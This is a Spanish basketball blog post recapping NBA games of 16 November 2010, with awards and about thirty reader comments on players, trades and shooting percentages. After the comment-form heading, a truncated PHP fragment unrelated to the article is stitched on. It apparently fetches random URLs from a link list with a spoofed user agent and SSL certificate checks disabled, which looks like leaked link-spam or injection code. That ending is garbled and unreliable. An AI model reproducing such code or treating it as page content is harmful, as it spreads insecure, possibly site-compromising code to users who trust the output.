La Crónica (16/11/2010)

17 de November de 2010 por TheDeerHunter

Los Lakers recuperaron la senda de la victoria en Milwaukee al inicio de su gira (118-107). No lo tuvieron fácil. Les costó, como en los últimos partidos, ajustar su defensa y cerrar el rebote durante la primera parte. Brandon Jennings es el base típico que les hace un roto y entre Bogut y Gooden capturaron 31 rebotes por los 40 en total de los amarillos. Los Lakers tiraron de los dos de siempre más la gran contribución de Odom y especialmente la de Shannon Brown, que ha progresado mucho del año pasado a éste. Ahora mismo el escolta es un buen candidato a mejor 6º hombre, siempre que Odom no vuelva a esa condición manteniendo el nivel actual.

Ayer en los medios españoles se especulaba con la posible titularidad de Rudy por la lesión de Roy. De eso nada. Lo fue Matthews quien lo agradeció con un partido digno del sustituido. Rudy se quedó compuesto, sin novia y con una triste contribución. Marc se solidarizó con él con una floja actuación, además de la derrota por muy poco de su equipo (100-99). Ojo que Camby también terminó lesionado.

Para terminar con la noche negra de los nuestros (excepto uno), Calderón también estuvo horrible ante Washington. En ausencia de Wall, Arenas volvió a erigirse como el gran capitán de su equipo conduciéndolos a una victoria cómoda (94-109).

En Houston, el gran partido de Scola y Miller no sirvió para quitarles la cara de tontos que se les quedó por cómo les birló el partido Rose en el último cuarto (95-92). Con el líder de los Bulls con problemas de faltas los Rockets llegaron a escaparse de casi 10 puntos al inicio del último pero Rose salió y, ante la descarada flotada que le pegaron,  les clavó dos triples en un abrir y cerrar de ojos para iniciar un parcial de 18-0 que destrozó el partido. Muy ilustrativo de la salud deportiva y mental del equipo de Adelman.

Por su parte, los Knicks trataron de llevarse la jornada para los equipos del Este también con un intento de remontada en el último cuarto contra los Nuggets. El rookie Landry Fields encabezó la reacción que a punto estuvieron de rentabilizar (118-120). En esta ocasión los hombres de George Karl lograron administrar a duras penas una mínima ventaja. Melo tuvo una difícil noche y sin embargo resolvió.

Finalmente los Hawks ganaron cómodos a Indiana con un partidazo de Josh Smith (102-92) y los Cavs doblegaron a los Sixers con Daniel Gibson en estado de gracia (93-101).

PREMIOS

MVP: 33 puntos, 7 asistencias, 3 robos de Derrick Rose y los Bulls que poco a poco van engrasando la maquinaria. Y recordemos que Carlos Boozer sigue lesionado.

Sorpresa: Wesley Matheews fue el escogido para salir de titular en los Blazers en detrimento de Rudy y la verdad es que demostró que está sobradamente preparado para llenar el hueco dejado por Brandon Roy. 30 puntos con buenos porcentajes tienen la culpa.

Decepción: Calderón nos deja una de cal y otra de arena. El partido de anoche fue de los malos con un 1 de 8 en tiros de campo y tan solo 2 asistencias en 17 minutos.

Rookie – Esfuerzo en vano: Si ayer comentábamos por primera vez la destacada temporada del rookie Landry Fields hoy no podemos hacer otra cosa que quitarnos el sombrero ante los 21 puntos, 17 rebotes y 2 robos que consiguió. Lástima que no obtuviera la recompensa de la victoria.

Comenta

30 comentarios a esta entrada

  1. Vader dice:
    #1

    Por lo menos una buena notícia en NY, Este Fields huele a robo del draft.

      Citar

  2. GreenPride dice:
    #2

    De esta noche vi el Bucks-Lakers. Buen partido de los Lakers para recuperar la senda victoriosa. Como dice la crónica sufrieron en la primera mitad ante los bases rápidos de los Bucks (tanto con Jennings como con lentejita Boykins) y también les costó contener a los Bucks en los tableros (Pau necesita ayuda ante equipos agresivos) pero aún así llevaron el partido bastante bien después del descanso apoyados en el trabajo de Pau, las canastas de Bryant y el partidazo sobre todo de Brown que está haciendo un gran año. El banquillo muy bien por los Lakers que inician bien su minigira de partidos fuera de casa.

      Citar

  3. sergio dice:
    #3

    Si el año pasado comentabamos la progresión de Frye en su lanzamiento exterior, es justo que ahora alabemos la mejora de Derrick Rose comparándolo a años anteriores:

    – Periodo 2008-10: 179 partidos, 132 lanzamientos de 3 por 32 convertidos. 24% de acierto.
    – Temporada 2010-11: 9 partidos, 34 lanzamientos por 11 conversiones con casi un 33% de acierto.

    Sextuplica su promedio de acierto y quintuplica sus lanzamientos por partido. Aún no tiene un gran porcentaje, pero empieza a ser digno. Thibodeau supongo que tiene algo de culpa tras ver como el año pasado flotaban a Rondo en las Finales. Lo habrá puesto a trabajar seriamente en ello, uno de sus escasisimos puntos debiles.

    De cualquier modo, parece que esta es una generación de bases poco anotadores desde mas allá del 7,25. Entre los 40 primeros jugadores en porcentaje de acierto, solo aparecen, como bases titulares: Fisher, Nash, Paul, Augustin, Holiday, Bibby y Collison. Solo Holiday, Paul, Collison y Augustin pertenecen a las nuevas horndas de bases.

    Vale, es cierto que el tiro es algo que se mejora constantemente, pero nos enfrentamos a una epoca de bases muy fisicos y mas dados a las penetraciones (lease Westbrook, Rondo, Deron, Rose, Wall, Harris, Stuckey o Brooks

      Citar

  4. sergio dice:
    #4

    Ah! y Ratliff fuera por periodo indeterminado y Odom parece que tiene dolores en uno de sus pies. Mas le vale a los fisios de Pau recuperarlo de un dia para otro porque parece que va a jugar durante muchos minutos hasta el año proximo

      Citar

  5. Vader dice:
    #5

    Te olvidas de S. Curry que es un gran tirador!!

    Saludos

      Citar

  6. sergio dice:
    #6

    Y a Jennings quizas… pero los considero “rara avis”

      Citar

  7. TheDeerHunter dice:
    #7

    El que extraña que no juegue nada es Caracter

      Citar

  8. rastud dice:
    #8

    que pensais de las posibilidades de los Bulls esta año??? yo los veo muy bien y D.Rose me encanta…

      Citar

  9. Rompe dice:
    #9

    Si vuelve Boozer sano y se adapta bien al sistema pueden ser un equipo muy peligroso. Los veo capaces de dar un susto a cualquiera de los gallos del este, especialmente a los Magic.

      Citar

  10. cocinitas dice:
    #10

    A los bulls incluso con la vuelta de boozer los veo un peldaño por debajo de los 3 favoritos del este, los veo al nivel de los hawks y creo q será un gran enfrentamiento de playoffs de primera ronda ya q creo q seran 5 y 6 en el este. Hablando de otro tema se disparan los rumores que hablan de la firma de Dampier por los lakers, lo que no se es si aceptará el minimo salarial o pedira la bi anual exception, lo cual al estar los lakers en impuesto de lujo les saldria el año de Dampier a razón de 4 millones, quiza demasiado para lo que jugará.

      Citar

  11. cocinitas dice:
    #11

    perdón quise decir 4 y 5 en el este.

      Citar

  12. Viva_Dirk dice:
    #12

    A Dampier no quiero verlo en los Lakers ni aunque pague por jugar.

      Citar

  13. cocinitas dice:
    #13

    Pues yo lo veo una mejor opción que caracter y ebanks, y en el mercado de jugadores libres no hay mucho más donde elegir.

      Citar

  14. Viva_Dirk dice:
    #14

    Creo que es mejor darle minutos a Caracter, mas intenso y mejor reboteador que Dampier es sin duda, y por tamaño no hay muchos jugadores a los que Gasol no pueda defender. Y con Ebanks igual, me gustan bastante los 2 rookies de este año.

      Citar

  15. TheDeerHunter dice:
    #15

    Si no me equivoco los Lakers tienen la bianual comprometida… y dudo mucho que Dampier llegara por el mínimo. De ser así no veo porqué no podría ser una buena incorporación teniendo en cuenta el problema que hay.
    De todas formas, ójala no haya que fichar a nadie.

      Citar

  16. cocinitas dice:
    #16

    El problema es que cualquier molestia de gasol que le impida jugar deja el puesto de 5 vacio en los Lakers.

      Citar

  17. Txusma dice:
    #17

    Si se le ficha a Dampier por un solo año puede ser un gran fichaje pq automáticamente sería “año de contrato” y ya sabemos cómo se las gasta el presidente del club del “Cazo Mix” 😀

      Citar

  18. Scriers dice:
    #18

    Lo cierto es que la nueva camada de bases lo tienen muy claro. Son mas dañinos de cara al aro y menos distribuidores y pasadores. A mi personalmente es un estilo que no me gusta. Prefiero un rondo, nash o paul a westbrook, stuckey, rose, brooks, holiday… pero tambien entiendo que hoy en dia un base debe tambien anotar. Sensaciones contradictorias.

    Por otro lado. Ayer vi un poco a todos los españoles. Nuestro exito de antaño ahora esta de capa caida. Marc esta para un equipo medio aportando cemento o un flojo nivel en equipo alto. Yo le veo escaso de recursos de ataque. Se mueve bien pero le falta muñeca y no le sale ni un gancho. Lo positivo su lectura de juego para doblarlas y los pick and roll.
    Calde esta pal arrastre. En defensa es un coladero y ha dejado de ser agresivo en ataque. Ya no es mrcatering porque no le llegan las piernas. Le queda una gran capacidad para encontrar asistencias faciles y un tiro irregulae. Veremos, pero suena mal.
    Rudy ed otro que mejor baila. Ayer le vi 20 minutps de pena. Le falla la posicion de los pies al lanzar. Tira muchas veces precipitado. Y de rol no se puede quejar. Ayer le llegaron balones y pasaban por sus manos. Que no ataque el aro es cosa suya. O es que belinelli no lo hace? O delfino? No se, es cuestion de superacion personal. Yo le sigo viendo potencial y talento pero… de nada sirve sin hechos.
    Y para hechos lo de gasol pau, hizo un partido muy bueno pese a dar una sensacion de que nose esforzaba demasiado. Creo que dosifica porque ya empieza a cargarse de minutos.

      Citar

  19. Denise dice:
    #19

    Que poderio ofensivo el de Lakers, aún con bajas, y e meten más de 110 puntos a cualquiera, inclusive a una buena defensa como la de los Bucks en su propia cancha,
    Yo, utilizaría el expiring de Vujacic para fichar a un pivot. Mi candidato sería Mohammed, aunque no creo que los Bocatas lo quieran traspasar (creo que es expiring también), si no, tiraría de Ben Wallace, que aún puede ayudar algo atrás.
    Lemontus, ya sé en qué es mejor Bogut que Howard, en…..fallar tiros libres. Vilma !!!!!. 🙂

      Citar

  20. Denise dice:
    #20

    Sciers, la culpa no es de Rudy, es de su entrenador, que no diseñan jugadas para él, le tienen manía, no le da minutos ó …..eso al menos es lo que cuentan los diarios españoles.
    Gran trabajo el de Mcmillan, con un equipo con muchas bajas (como siempre) y manteniendo marca positiva en el Durísimo Oeste.

    Otro que hay que reconocer el temporadón que está haciendo es Rudy Gay. Brutal !

      Citar

  21. LEmontus dice:
    #21

    Por supuestísimo que Bogut es mejor que howard y al igual que ya varias bocas se han callado con Warrick lo mismo pasará con Bogut.

    Lo que si tengo que admitir que el bogut de despuese la lesiçon ha perdido muchísimo en ataque y muchísimos tiros de los que metía antes los está fallando ahora. Aunque también es verdad que cada partido mejora un poco y es que llevarse un casi un año en blanco y lesionarte tu brazo bueno se tiene que notar.

    P.D: Bogu siempre fue malo tirando tiros libres

      Citar

  22. LEmontus dice:
    #22

    Am y como dato Jennings no hizo un roto por sus cualidades de base rápido lo hizo porque metió casit todo lo que tiró en la primera parte y en la segunda estuvo un poco peor.

      Citar

  23. McNulty dice:
    #23

    % de brandom jennings:

    Year Team G GS MPG FG% 3P% FT%
    09-10 MIL 82 82 32.6 0.371 0.374 0.817
    10-11 MIL 11 11 35.2 0.416 0.377 0.810

    excepto los de tiros libres, el resto de porcentajes deja mucho que desear…

      Citar

  24. Denise dice:
    #24

    Iverson debutó con el Besiktas. En 24 minutos, 15 puntos, con 4/6 en tiros libres, 1/6 en tiros de 2 y 3/4 en triples. Iverson salió a pista los últimos 5 minutos con el equipo ganando de 12 y qué pasó?? Que el equipo acabó perdiendo (no sé si tuvo algo que ver)

      Citar

  25. Cocinitas dice:
    #25

    Es una pena que jugadores con tantisimo talento como Iverson acaben asi sus carreras por su mala cabeza.

      Citar

  26. sergio dice:
    #26

    Porq Jennings en triples deja mucho que desear? A mi un 37,7% me parece un buen promedio…

      Citar

  27. LEmontus dice:
    #27

    38% en triples con la cantidad de triples que se pega es un muy buen porcentaje Mcnuty

      Citar

  28. troll dice:
    #28

    El problema de Jennings esta en la selección de tiro,hay un articulo en nbaplaybook hablando de ello,es un base que con el tiempo mejorara,sera esporadicamente all-star .

      Citar

  29. CAMPO2 dice:
    #29

    Creo que lo de Ben Wallace es imposible, ya que los cascos azules tendrian que ir en mision de paz. No recordais la palabras de Ron Artest? “Cada vez que lo veo tengo ganas de pegarle”

      Citar

  30. HeiNeKeN dice:
    #30

    Otro que se divorcia… Toni Parker de Eva Longoria… o viceversa xD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>